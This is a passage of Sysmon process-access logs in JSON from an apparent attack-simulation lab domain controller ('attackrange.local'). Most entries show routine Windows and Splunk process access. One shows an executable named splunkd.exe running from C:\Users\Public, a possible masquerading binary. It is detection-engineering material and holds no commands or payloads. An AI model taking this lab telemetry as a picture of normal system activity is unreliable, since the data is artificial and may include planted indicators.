C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:21.927","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2261,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:21.927\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:21.927","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2262,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:21.927\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:21.927","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2263,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:21.927\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:21.927","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2264,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:21.927\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:21.927","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2265,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:21.927\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:21.927","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2266,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:21.927\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1071-5F25-0000-001071190400}\r\nTargetProcessId: 3772\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:21.927","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1071-5F25-0000-001071190400}","TargetProcessId":"3772","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2267,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:21.943\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1071-5F25-0000-001071190400}\r\nTargetProcessId: 3772\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:21.943","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1071-5F25-0000-001071190400}","TargetProcessId":"3772","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2268,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:22.739\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 